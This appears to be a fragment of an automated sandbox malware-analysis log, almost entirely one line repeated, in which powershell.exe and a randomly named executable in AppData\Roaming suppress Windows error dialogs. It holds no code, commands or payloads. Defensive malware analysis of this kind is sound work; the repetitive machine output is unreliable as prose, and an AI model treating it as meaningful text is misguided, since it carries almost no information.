                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
